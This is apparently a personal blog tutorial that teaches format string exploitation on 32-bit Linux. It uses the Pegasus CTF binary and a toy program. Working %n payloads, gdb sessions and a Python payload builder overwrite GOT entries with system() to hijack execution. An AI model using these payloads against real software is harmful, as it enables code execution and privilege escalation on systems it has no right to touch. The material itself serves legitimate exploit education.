Format string vulnerabilities made easy

Hey all. I'm writing this 50% to help everyone out, but 50% to reinforce it for myself :P

I DUN LIKE FORMAT STRING VULNS, but I'm going to be good at them! Maybe someday I'll like them more.

Here we go, I'm going to test on the binary for Pegasus (source will be later on in the post), and also a few more that I can find online. Everything will be 32-bit.

A few things before we start:

  • I will be working with 32-bit binaries only. (-m32 in gcc)
  • ASLR needs to be disabled.
    • 32-bit system: ulimit -s unlimited
    • 64-bit system: echo "0" > /proc/sys/kernel/randomize_va_space

Okay, here we go!

Pegasus Binary

The source code was released in the image. First we'll do this manually.

#include <stdio.h>
#include <stdlib.h>

int calculator();  
int string_replay();  
int string_reverse();  
int quit();

int main()  
{
    char selection[5];
    int sel;
    char * err_check;

    printf("WELCOME TO MY FIRST TEST PROGRAM\n");
    printf("--------------------------------\n");
    printf("Select your tool:\n");
    printf("[1] Calculator\n");
    printf("[2] String replay\n");
    printf("[3] String reverse\n");
    printf("[4] Exit\n\n");

    do
    {
        printf("Selection: ");
        if (fgets(selection, sizeof selection, stdin) != NULL)
        {
            sel = strtol(selection, &err_check, 10);
            switch (sel)
            {
                case 1:
                {
                    calculator();
                    break;
                }
                case 2:
                {
                    string_replay();
                    break;
                }
                case 3:
                {
                    string_reverse();
                    break;
                }
                case 4:
                {
                    quit();
                    break;
                }
                default:
                {
                    printf("\nError: Incorrect selection!\n\n");
                }
            }
        }
        else
        {
            printf("\nBye!\n");
            break;
        }
    }
    while (sel != 4);
}

int calculator()  
{
    char numberA[50];
    char numberB[50];
    char * err_check;
    printf("\nEnter first number: ");
    if (fgets(numberA, sizeof numberA, stdin) != NULL)
    {
        printf("Enter second number: ");
        if (fgets(numberB, sizeof numberB, stdin) != NULL)
        {
            int numA = strtol(numberA, &err_check, 10);
            int numB = strtol(numberB, &err_check, 10); 
            if (*err_check != '\n')
            {
                printf("Error details: ");
                printf(err_check);
                printf("\n");
                return 1;
            }
            else
            {
                int sum = numA + numB;
                printf("Result: %i + %i = %i\n\n", numA, numB, sum);
                return 0;
            }
        }
        else
        {
            printf("\nBye!\n");
            return 1;
        }
    }
    else
    {
        printf("\nBye!\n");
        return 1;
    }
}

int string_replay()  
{
    char input[100];
    printf("\nEnter a string: ");
    if (fgets(input, sizeof input, stdin) != NULL)
    {
        printf("You entered: %s\n", input);
    }
    else
    {
        printf("\nBye!\n");
        return 1;
    }
    return 0;
}

int string_reverse()  
{
    //TODO
    printf("\nError: Not yet implemented!\n\n");
    return 1;
}

int quit()  
{
    printf("\nGoodbye!\n");
    return 0;
}

If you have the source code to look at, the thing to watch out for is printf(variable): a call where user-controlled input is used as the format string itself. That lets us inject format specifiers, such as %x and %n, and make the program do things its author never intended. Here the culprit is printf(err_check) in calculator().

So, copy that code into a file, and compile it.

root@shadow ~/formatstr$ gcc -m32 -o pegasus pegasus.c  

And now we have our vulnerable program. So, let's run it and see what it does. According to the source code, we need to focus on the calculator() function, but if we didn't have the source code, a bit of fuzzing would be required.

WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection: 1

Enter first number: 5  
Enter second number: 2  
Result: 5 + 2 = 7

Selection: 4

Goodbye!  

So, it works as expected. We plugged in some numbers and got the sum. What happens if we plug in a format specifier, like %x?

root@shadow ~/formatstr$ ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection: 1

Enter first number: 1  
Enter second number: %x  
Error details: ff9d445c

Selection: 4

Goodbye!  

Ooooh! It spit back some data off the stack! We can use printf in BASH to make it easier to navigate the menu, and faster to test the exploits.

root@shadow ~/formatstr$ printf '1\n1\n%%x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ffcf492c

Selection:  
Goodbye!  

Note the double %% is required to escape the character in printf.
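
If the %% escaping gets tedious, the same menu input can be built in Python, where % needs no escaping inside a bytes literal. This is only a minimal sketch (Python 3); the helper name menu_input is made up for this post and is not part of any tool.

```python
def menu_input(fmt: bytes, quit_after: bool = True) -> bytes:
    """Pick option 1, answer '1' for the first number, send fmt as the second."""
    data = b"1\n1\n" + fmt + b"\n"
    if quit_after:
        data += b"4\n"  # choose Exit so the program ends cleanly
    return data

# Same bytes that printf '1\n1\n%%x\n4\n' produces in the shell
probe = menu_input(b"%x")
```

Writing probe to a file (or to sys.stdout.buffer) gives the same input that the shell one-liner pipes into ./pegasus.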

Now, let's see where our input is stored on the stack. We are going to send four A's, and then keep adding %x until we see 0x41414141.

root@shadow ~/formatstr$ printf '1\n1\nAAAA.%%x.%%x.%%x.%%x.%%x.%%x.%%x.%%x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: AAAA.ffb24c7c.a.ffb24c7c.f7750ff4.3.3.ffb24c80.41414141

Selection:  
Goodbye!  

Which is 8 places in. We can shorten this with direct parameter access (%8$x) to give us exactly what we want.

root@shadow ~/formatstr$ printf '1\n1\nAAAA.%%8$x\n4\n' | ./pegasus  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: AAAA.41414141

Selection:  
Goodbye!  
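
Counting the places by eye gets error-prone with longer dumps, so here is a small sketch that does the counting. It assumes the probe used "." as the separator, exactly like the AAAA.%x.%x... input above; find_offset is a name I made up.

```python
def find_offset(leak: str, marker: int = 0x41414141) -> int:
    """Return the 1-based position of marker among dot-separated hex words."""
    words = leak.strip().split(".")[1:]  # drop the leading "AAAA"
    for position, word in enumerate(words, start=1):
        if int(word, 16) == marker:
            return position
    raise ValueError("marker not found; add more %x and try again")

leak = "AAAA.ffb24c7c.a.ffb24c7c.f7750ff4.3.3.ffb24c80.41414141"
print(find_offset(leak))  # 8
```

The number it returns is the one that goes into the %N$x (and later %N$n) specifier.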

So now we control a value on the stack that printf() treats as one of its arguments. Great! But what are we going to do with that power? With printf()'s %n format specifier, we can write data to an address of our choosing. What we want to do is replace the GOT entry for printf() with the address of system(), so that when the program calls printf(), it runs system() instead.

So, let's collect the addresses that we need. We are going to need the address of printf()'s GOT entry and the address of system(). For the GOT entry, we can simply use objdump, but system() is going to require just a little bit more work.

root@shadow ~/formatstr$ objdump -R pegasus

pegasus:     file format elf32-i386

DYNAMIC RELOCATION RECORDS  
OFFSET   TYPE              VALUE  
08049bec R_386_GLOB_DAT    __gmon_start__  
08049c20 R_386_COPY        stdin  
08049bfc R_386_JUMP_SLOT   printf  
08049c00 R_386_JUMP_SLOT   fgets  
08049c04 R_386_JUMP_SLOT   puts  
08049c08 R_386_JUMP_SLOT   __gmon_start__  
08049c0c R_386_JUMP_SLOT   __libc_start_main  
08049c10 R_386_JUMP_SLOT   putchar  
08049c14 R_386_JUMP_SLOT   strtol  

This shows that the GOT entry for printf() is at the address 0x08049bfc. Now to find system(), we are going to need to use gdb.

root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) break main
Breakpoint 1 at 0x804850f  
(gdb) run
Starting program: /root/formatstr/pegasus 

Breakpoint 1, 0x0804850f in main ()  
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e91c30 <system>
(gdb)

So system() lives at 0xf7e91c30. Note: your addresses are probably different. Just follow along with the steps and you should get the same outcome.
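
Since your addresses will differ, it can help to pull the GOT slot out of the objdump -R output instead of copying it by hand. A rough sketch, assuming the three-column layout shown above; got_slot is a made-up helper, and the "@" handling is only there because some binutils versions print names like printf@GLIBC_2.0.

```python
def got_slot(objdump_output: str, symbol: str) -> int:
    """Find the R_386_JUMP_SLOT offset for symbol in `objdump -R` text."""
    for line in objdump_output.splitlines():
        fields = line.split()
        if len(fields) != 3 or fields[1] != "R_386_JUMP_SLOT":
            continue
        name = fields[2].split("@")[0]  # tolerate a version suffix
        if name == symbol:
            return int(fields[0], 16)
    raise KeyError(symbol)

SAMPLE = """\
OFFSET   TYPE              VALUE
08049bfc R_386_JUMP_SLOT   printf
08049c00 R_386_JUMP_SLOT   fgets
08049c04 R_386_JUMP_SLOT   puts
"""
print(hex(got_slot(SAMPLE, "printf")))  # 0x8049bfc
```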

Now would actually be a good time to make sure that ASLR is disabled, or else the exploit will fail.

root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)
root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)
root@shadow ~/formatstr$ ldd pegasus  
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)

Just make sure that the same addresses show up each time.
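
Comparing the runs by eye works, but the check is easy to script. This is a sketch under the assumption that you have captured the text of several ldd runs yourself; both function names are hypothetical.

```python
import re

def load_addresses(ldd_output: str) -> list:
    """Collect every (0x...) load address printed by ldd, in order."""
    return re.findall(r"\((0x[0-9a-fA-F]+)\)", ldd_output)

def aslr_looks_disabled(runs: list) -> bool:
    """True when every captured ldd run reports the same load addresses."""
    return len({tuple(load_addresses(run)) for run in runs}) == 1

run = """\
    linux-gate.so.1 =>  (0xf7ffd000)
    libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xf7e74000)
    /lib/ld-linux.so.2 (0x56555000)
"""
print(aslr_looks_disabled([run, run, run]))  # True
```

If it returns False, the libc base moved between runs and the system() address from gdb will not hold.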

Now onto the exploit. First we are going to change from AAAA to the address we are targeting, then try to write to it.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08%%8$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ��


Program received signal SIGSEGV, Segmentation fault.  
0x00000004 in ?? ()  
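
The \xfc\x9b\x04\x08 at the front of that payload is just the GOT address 0x08049bfc written out in little-endian byte order, which is how a 32-bit x86 process stores it on the stack. A minimal sketch of the conversion (pack_addr is my own name for it):

```python
import struct

def pack_addr(addr: int) -> bytes:
    """Pack a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", addr)

printf_got = 0x08049bfc
print(pack_addr(printf_got))  # b'\xfc\x9b\x04\x08'
```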

So, %n doesn't print anything; it writes the number of characters printed so far to the address its argument points to. The four address bytes are the only output so far, hence the value 0x00000004. We want to change that 0x4 into our system() address. We will do this two bytes at a time. So, the next thing we want to accomplish is to get that value to say 0x00001c30. How do we do that? Great question! We need printf() to have output a total of 0x1c30 characters by the time it reaches %n. We have already output 0x4, so we can use python to determine the decimal value that is still needed.

root@shadow ~/formatstr$ python -c 'print 0x1c30-0x4'  
7212  

Now we can alter our payload to print 7212 additional characters, using %7212u as padding.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08%%7212u%%8$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ��

...

Program received signal SIGSEGV, Segmentation fault.  
0x00001c30 in ?? ()  

Hey look at that! Our number has become exactly what we wanted! Well, half of it anyways. Now let's get the other half!

We are going to add the address again, but this time instead of \xfc we are going to put \xfe. This is because we are writing the value in two parts: 0x08049bfc points at the lower two bytes of printf()'s GOT entry, and 0x08049bfe points at the upper two bytes. When we duplicate the %%8$n at the end, we need to change the copy to %%9$n, because the second address sits in the next four-byte slot on the stack, which makes it argument 9. You'll see what I mean below.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7212u%%8$n%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ���

...

Program received signal SIGSEGV, Segmentation fault.  
0x1c341c34 in ?? ()  

Now we have written to both halves! The only thing left to do is set the correct value of the upper half (0xf7e9). One thing to note is that instead of 0x1c30, it is now 0x1c34. This is because the second address added four more characters to the output. So we need to subtract 4 from 7212.

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7208u%%8$n%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ����

...

Program received signal SIGSEGV, Segmentation fault.  
0x1c301c30 in ?? ()  

There we go! That looks better. Now we are going to use python to find our offset again.

root@shadow ~/formatstr$ python -c 'print 0xf7e9-0x1c30'  
56249  

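Note, one problem that I ran into was that I was getting negative numbers when running this on the actual Pegasus machine. That happens when the upper half of system()'s address is smaller than the lower half. If it does, simply put a 1 in front of the value you want (that is, add 0x10000), since only the low two bytes of the count land in the half we care about. Like the following: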

root@shadow ~/formatstr$ python -c 'print 0x1f7e9-0x1c30'  

But only do that if you initially get a negative number.
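
Both cases collapse into one line of modular arithmetic, which saves having to remember when to add the extra 1. A small sketch (pad_for is a hypothetical helper; it assumes the padding is done with %Nu, so very small results are unreliable because %Nu always prints at least the digits of the number):

```python
def pad_for(target: int, written: int) -> int:
    """Characters still to print so the low 16 bits of the count equal target."""
    return (target - written) % 0x10000

print(pad_for(0x1c30, 8))       # 7208, low half after two 4-byte addresses
print(pad_for(0x1c30, 0xf7e9))  # 9287, the wrap-around ("negative") case
print(pad_for(0xf7e9, 0x1c30))  # 56249, upper half for our system()
```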

Now we can plug this number into our exploit!

root@shadow ~/formatstr$ printf '1\n1\n\xfc\x9b\x04\x08\xfe\x9b\x04\x08%%7208u%%8$n%%56249u%%9$n\n' > payload  
root@shadow ~/formatstr$ gdb -q ./pegasus  
Reading symbols from /root/formatstr/pegasus...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/pegasus < payload  
WELCOME TO MY FIRST TEST PROGRAM  
--------------------------------
Select your tool:  
[1] Calculator
[2] String replay
[3] String reverse
[4] Exit

Selection:  
Enter first number: Enter second number: Error details: ����

...

sh: 1: Selection:: not found

Program received signal SIGSEGV, Segmentation fault.  
0xf7eb0006 in ?? () from /lib/i386-linux-gnu/i686/cmov/libc.so.6  

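Hooray, it worked! For this particular program, we replaced printf("Selection: ") with system("Selection: "), which is why it says sh: 1: Selection:: not found. For this, we simply had to make an executable file named Selection: in our PATH that it could run. We had complete control! The segfault afterwards is most likely a side effect of %n writing a full four bytes: the write at 0x08049bfe also zeroes the lower half of the neighboring GOT entry for fgets() at 0x08049c00, so the next fgets() call jumps somewhere useless.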
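
For reference, the whole manual process can be folded into one function. This is only a sketch of the steps from this post, not a general-purpose tool: build_payload is a made-up name, it assumes the lower half is written first, that both pads are large enough for %Nu to print exactly N characters, and that none of the address bytes are newlines or NULs (fgets would cut the input short).

```python
import struct

def build_payload(got: int, target: int, first_arg: int) -> bytes:
    """Two-%n payload: low half of target to got, high half to got + 2."""
    low, high = target & 0xFFFF, (target >> 16) & 0xFFFF
    payload = struct.pack("<I", got) + struct.pack("<I", got + 2)
    written = len(payload)  # the 8 address bytes are printed first
    pad_low = (low - written) % 0x10000
    payload += b"%%%du%%%d$n" % (pad_low, first_arg)
    pad_high = (high - low) % 0x10000  # count is already at low here
    payload += b"%%%du%%%d$n" % (pad_high, first_arg + 1)
    return payload

# printf GOT slot, system() address, and stack offset from this post
print(build_payload(0x08049bfc, 0xf7e91c30, 8))
```

For Pegasus, the result still needs the menu input in front (1, newline, 1, newline) and a trailing newline, just like the shell version.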

fmtstr

Here is the source of this file:

#include <stdio.h>

void vulnfunction(char *msg)  
{
    printf(msg);
}

int main(int argc, char **argv)  
{
    char buff[256];

    printf("Input: ");
    fgets(buff, 256, stdin);
    vulnfunction(buff);
    printf("Bye\n");
    return 0;
}

When running it, we can easily find our stack offset.

root@shadow ~/formatstr$ ./fmtstr  
Input: AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x  
AAAA.0.ff839320.f7760ff4.0.0.ff839428.8048500.ff839320.100.f7761440.0.41414141  
root@shadow ~/formatstr$ ./fmtstr  
Input: AAAA.%12$x  
AAAA.41414141  
Bye  

So now we know that our input is the 12th argument on the stack. Now let's start collecting addresses. Looking at the disassembled code, we see that after vulnfunction() is called, main() calls puts().

root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) disas main
Dump of assembler code for function main:  
   0x080484bf <+0>:    push   %ebp
   0x080484c0 <+1>:    mov    %esp,%ebp
   0x080484c2 <+3>:    and    $0xfffffff0,%esp
   0x080484c5 <+6>:    sub    $0x110,%esp
   0x080484cb <+12>:    movl   $0x80485b0,(%esp)
   0x080484d2 <+19>:    call   0x8048370 <printf@plt>
   0x080484d7 <+24>:    mov    0x8049788,%eax
   0x080484dc <+29>:    mov    %eax,0x8(%esp)
   0x080484e0 <+33>:    movl   $0x100,0x4(%esp)
   0x080484e8 <+41>:    lea    0x10(%esp),%eax
   0x080484ec <+45>:    mov    %eax,(%esp)
   0x080484ef <+48>:    call   0x8048380 <fgets@plt>
   0x080484f4 <+53>:    lea    0x10(%esp),%eax
   0x080484f8 <+57>:    mov    %eax,(%esp)
   0x080484fb <+60>:    call   0x80484ac <vulnfunction>
   0x08048500 <+65>:    movl   $0x80485b8,(%esp)
   0x08048507 <+72>:    call   0x8048390 <puts@plt>
   0x0804850c <+77>:    mov    $0x0,%eax
   0x08048511 <+82>:    leave  
   0x08048512 <+83>:    ret    
End of assembler dump.  

So we are going to look for the GOT address of puts() using objdump.

root@shadow ~/formatstr$ objdump -R ./fmtstr

./fmtstr:     file format elf32-i386

DYNAMIC RELOCATION RECORDS  
OFFSET   TYPE              VALUE  
0804975c R_386_GLOB_DAT    __gmon_start__  
08049788 R_386_COPY        stdin  
0804976c R_386_JUMP_SLOT   printf  
08049770 R_386_JUMP_SLOT   fgets  
08049774 R_386_JUMP_SLOT   puts  
08049778 R_386_JUMP_SLOT   __gmon_start__  
0804977c R_386_JUMP_SLOT   __libc_start_main  

Now for system(), we can leak the address with gdb.

root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) break main
Breakpoint 1 at 0x80484c2  
(gdb) run
Starting program: /root/formatstr/fmtstr 

Breakpoint 1, 0x080484c2 in main ()  
(gdb) print system
$1 = {<text variable, no debug info>} 0x555d3c30 <system>

So we have our two addresses.
0x08049774 = GOT entry for puts()
0x555d3c30 = system()
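
Because the value gets written one half at a time, it is worth splitting it up front and noting which address each half goes to. A tiny sketch (split_halves is my own helper name):

```python
def split_halves(addr: int):
    """Return (low 16 bits, high 16 bits) of a 32-bit address."""
    return addr & 0xFFFF, (addr >> 16) & 0xFFFF

puts_got = 0x08049774
low, high = split_halves(0x555d3c30)
print(hex(low), "->", hex(puts_got))       # 0x3c30 -> 0x8049774
print(hex(high), "->", hex(puts_got + 2))  # 0x555d -> 0x8049776
```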

Now to start our exploit. This is pretty much going to go just like the Pegasus program, so this should seem fairly familiar if you already followed along with that one.

The first thing we'll do is use BASH's printf to create our payload, then run it in gdb to see what happens. We are going to send the address that we want to overwrite, followed by %12$n (our offset plus %n), which writes the number of characters printed so far to that address.

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08%%12$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) r < payload 
Starting program: /root/formatstr/fmtstr < payload

Program received signal SIGSEGV, Segmentation fault.  
0x00000004 in ?? ()  
(gdb)

So, since we have printed four characters (the address), the value is now 0x4. We are going to write the value one half at a time. We want to turn that 0x4 into the address of system(). We will focus on the lower half first, which is 0x3c30. We need that as a decimal number, minus the characters we have already printed. We will then pad the output by that amount, so that %n writes the value we want.

We can use python to find what the value should be.

root@shadow ~/formatstr$ python -c 'print 0x3c30-0x4'  
15404  

So we can put that value into our payload, and run it to see what our address is now.

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08%%15404u%%12$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�

...

Program received signal SIGSEGV, Segmentation fault.  
0x00003c30 in ?? ()  

Hooray! We wrote 0x3c30 to our address! Now let's get the upper half! We are going to add a second address, two bytes higher, pointing at the upper half of the GOT entry. We will also need to add %%13$n to the end of our payload. It is 13 instead of 12 because the second address occupies the next four-byte slot on the stack.

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15404u%%12$n%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload 
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v�

...

Program received signal SIGSEGV, Segmentation fault.  
0x3c343c34 in ?? ()  

So something interesting happened here. We now have the same value written on each half, but it isn't 0x3c30 anymore, it is four bytes more! That is because we wrote four more bytes when writing our second address. We simply need to subtract four from our number (15404-4).

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15400u%%12$n%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v�

...

Program received signal SIGSEGV, Segmentation fault.  
0x3c303c30 in ?? ()  

There we go! That looks better. Now we need to fix the value of our first half. We will do this again by using python to figure out what number needs to be written.

We will take what we want, and subtract what we have already written.

root@shadow ~/formatstr$ python -c 'print 0x555d-0x3c30'  
6445  

There we go, much better! So, all we need to do now, is plug that number in just like we did the first one!

root@shadow ~/formatstr$ printf '\x74\x97\x04\x08\x76\x97\x04\x08%%15400u%%12$n%%6445u%%13$n' > payload  
root@shadow ~/formatstr$ gdb -q ./fmtstr  
Reading symbols from /root/formatstr/fmtstr...(no debugging symbols found)...done.  
(gdb) run < payload
Starting program: /root/formatstr/fmtstr < payload  
Input: t�v� 

...

sh: 1: Bye: not found  
4294957264[Inferior 1 (process 28657) exited normally]  

Hey! It exited normally? Hmm... Oh, it says that Bye was not found. That is because we overwrote the GOT entry for puts(), turning puts("Bye") into system("Bye"). So now all we need to do is create an executable file named Bye and put it in our PATH. When the program runs, it will execute our file, with the privileges of the file's owner if the binary is SUID.
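
As a sanity check before firing a payload, the running character count can be tallied without running the target at all. The sketch below only understands the two directives used in this post (%Nu padding and %K$n) and assumes each %Nu prints exactly N characters; simulate_counts is a hypothetical name.

```python
import re

def simulate_counts(payload: bytes) -> dict:
    """Map each %K$n argument index to the character count it would store."""
    count = 0
    stores = {}
    pos = 0
    for m in re.finditer(rb"%(\d+)u|%(\d+)\$n", payload):
        count += m.start() - pos  # literal bytes are printed as-is
        if m.group(1) is not None:
            count += int(m.group(1))  # %Nu pads its output to N characters
        else:
            stores[int(m.group(2))] = count  # %K$n stores the count, prints nothing
        pos = m.end()
    return stores

final = b"\x74\x97\x04\x08\x76\x97\x04\x08%15400u%12$n%6445u%13$n"
print({arg: hex(val) for arg, val in simulate_counts(final).items()})
# {12: '0x3c30', 13: '0x555d'}
```

Argument 12 gets the lower half and argument 13 the upper half, which together make 0x555d3c30, the system() address from earlier.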

Hooray! I hope this helps some of you struggling with format string vulns. I may add some more examples here in the future.